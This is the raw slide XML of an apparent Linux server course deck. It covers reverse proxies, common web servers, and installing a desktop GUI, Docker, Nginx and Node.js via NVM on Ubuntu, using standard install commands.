              </a:rPr>
              <a:t>8080</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>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u="sng">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId5">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>http://app2:vishalmahawar.shop</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> -&gt; IP:8080 </a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:schemeClr val="dk2"/>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42"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="365075" y="1733000"/>
            <a:ext cx="8520600" cy="768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800" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>Setup </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="3800" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>Reverse Proxy with SSL</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3600">
              <a:solidFill>
                <a:schemeClr val="accent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pic>
        <p:nvPicPr>
          <p:cNvPr id="814" name="Google Shape;814;p143"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="6139" l="0" r="0" t="5769"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1295200" y="39825"/>
            <a:ext cx="2855796" cy="5063876"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="815" name="Google Shape;815;p143"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4441325" y="39813"/>
            <a:ext cx="3090549" cy="50638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6"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="1718" r="4893" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1110825" y="688625"/>
            <a:ext cx="7036099" cy="4237650"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="180" name="Google Shape;180;p36"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="368575" y="76200"/>
            <a:ext cx="8520600" cy="49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900" u="sng">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId4">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>Popular Desktop Environment for Linux</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2900">
              <a:solidFill>
                <a:schemeClr val="accent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44"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="196350"/>
            <a:ext cx="8520600" cy="76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chemeClr val="accent1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>Web Servers</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="821" name="Google Shape;821;p144"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="575700" y="1082050"/>
            <a:ext cx="7771200" cy="36708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t/>
            </a:r>
            <a:endParaRPr b="1" sz="2100">
              <a:solidFill>
                <a:srgbClr val="9900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45"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="196350"/>
            <a:ext cx="8520600" cy="76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chemeClr val="accent1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>How to install GUI in Linux GUI</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="827" name="Google Shape;827;p145"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="575700" y="1082050"/>
            <a:ext cx="7771200" cy="3670800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>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rPr b="1" lang="en" sz="2100" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://docs.google.com/document/d/1BkSzX4Im0DD04zelDhU84CaAMesc5J6zYTCR8riSPd4/edit?usp=sharing</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2100">
              <a:solidFill>
                <a:srgbClr val="990000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="2100">
                <a:solidFill>
                  <a:srgbClr val="990000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Or</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2100">
              <a:solidFill>
                <a:srgbClr val="990000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="2100" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://subscription.packtpub.com/book/data/9781788474221/1/ch01lvl1sec15/installing-and-configuring-ubuntu-desktop-for-google-cloud-platform</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2100">
              <a:solidFill>
                <a:srgbClr val="990000"/>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46"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-81000" y="1596575"/>
            <a:ext cx="8520600" cy="1161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t/>
            </a:r>
            <a:endParaRPr sz="3600">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="30555"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3600">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>curl -fsSL https://get.docker.com | sh</a:t>
            </a:r>
            <a:endParaRPr sz="3600">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="30555"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="3600">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="833" name="Google Shape;833;p146"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="243000" y="444925"/>
            <a:ext cx="8520600" cy="84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chemeClr val="accent1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>Install Docker &amp; Docker compose on Ubuntu</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:schemeClr val="accent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7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1616825"/>
            <a:ext cx="8520600" cy="116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chemeClr val="accent1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>Create a Docker container with GUI</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="839" name="Google Shape;839;p147"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="404425"/>
            <a:ext cx="8520600" cy="84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chemeClr val="accent1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>Assignment</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:schemeClr val="accent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8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="169000"/>
            <a:ext cx="8520600" cy="76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400">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>Web Servers</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3200">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="845" name="Google Shape;845;p148"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="622125" y="887075"/>
            <a:ext cx="7771200" cy="3670800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-361950" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="38761D"/>
              </a:buClr>
              <a:buSzPts val="2100"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="2100" u="sng">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>Nginx</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="2100">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>                   (Mostly used) </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-361950" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="38761D"/>
              </a:buClr>
              <a:buSzPts val="2100"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="2100" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>Apache2</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="2100">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>              (Mostly used)</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2100">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-361950" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="990000"/>
              </a:buClr>
              <a:buSzPts val="2100"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="2100" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>Apache TomCat</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="2100">
                <a:solidFill>
                  <a:srgbClr val="990000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  ( Generally used for Java Application)</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2100">
              <a:solidFill>
                <a:srgbClr val="990000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-361950" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="990000"/>
              </a:buClr>
              <a:buSzPts val="2100"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="2100" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>Lighthttpd</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="2100">
                <a:solidFill>
                  <a:srgbClr val="990000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>           (Generally used for PHP Application)</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2100">
              <a:solidFill>
                <a:srgbClr val="990000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-361950" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="990000"/>
              </a:buClr>
              <a:buSzPts val="2100"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="2100" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>Microsoft IIS</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="2100">
                <a:solidFill>
                  <a:srgbClr val="990000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>       (Generally used for .Net Application)</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2100">
              <a:solidFill>
                <a:srgbClr val="990000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-361950" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="990000"/>
              </a:buClr>
              <a:buSzPts val="2100"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="2100" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId8"/>
              </a:rPr>
              <a:t>PUMA</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="2100">
                <a:solidFill>
                  <a:srgbClr val="990000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="2100">
                <a:solidFill>
                  <a:srgbClr val="990000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>               (Generally used for Ruby Application)</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2100">
              <a:solidFill>
                <a:srgbClr val="990000"/>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Install</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Nginx on Ubuntu 22</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="851" name="Google Shape;851;p149"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1982875" y="1017725"/>
            <a:ext cx="5956200" cy="3779700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-396875" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6AA84F"/>
              </a:buClr>
              <a:buSzPts val="2650"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2650">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sudo apt update</a:t>
            </a:r>
            <a:endParaRPr sz="2650">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-396875" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6AA84F"/>
              </a:buClr>
              <a:buSzPts val="2650"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2650">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sudo apt install nginx</a:t>
            </a:r>
            <a:endParaRPr sz="2650">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-396875" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6AA84F"/>
              </a:buClr>
              <a:buSzPts val="2650"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2650">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sudo systemctl start nginx</a:t>
            </a:r>
            <a:endParaRPr sz="2650">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-396875" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6AA84F"/>
              </a:buClr>
              <a:buSzPts val="2650"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2650">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sudo systemctl enable nginx</a:t>
            </a:r>
            <a:endParaRPr sz="2650">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-396875" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6AA84F"/>
              </a:buClr>
              <a:buSzPts val="2650"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2650">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ip a</a:t>
            </a:r>
            <a:endParaRPr sz="2650">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-396875" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6AA84F"/>
              </a:buClr>
              <a:buSzPts val="2650"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2650">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sudo systemctl status nginx</a:t>
            </a:r>
            <a:endParaRPr sz="2650">
              <a:solidFill>
                <a:srgbClr val="6AA84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50"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1786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620" u="sng">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>Install NodeJs Using NVM</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2620">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="857" name="Google Shape;857;p150"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="649200"/>
            <a:ext cx="8520600" cy="4282800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-326072" lvl="0" marL="457200" marR="139700" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6AA84F"/>
              </a:buClr>
              <a:buSzPts val="1535"/>
              <a:buFont typeface="Courier New"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1535">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>curl -sL https://raw.githubusercontent.com/nvm-sh/nvm/v0.39.5/install.sh -o install_nvm.sh</a:t>
            </a:r>
            <a:endParaRPr sz="1535">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-326072" lvl="0" marL="457200" marR="139700" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
              <a:spcBef>
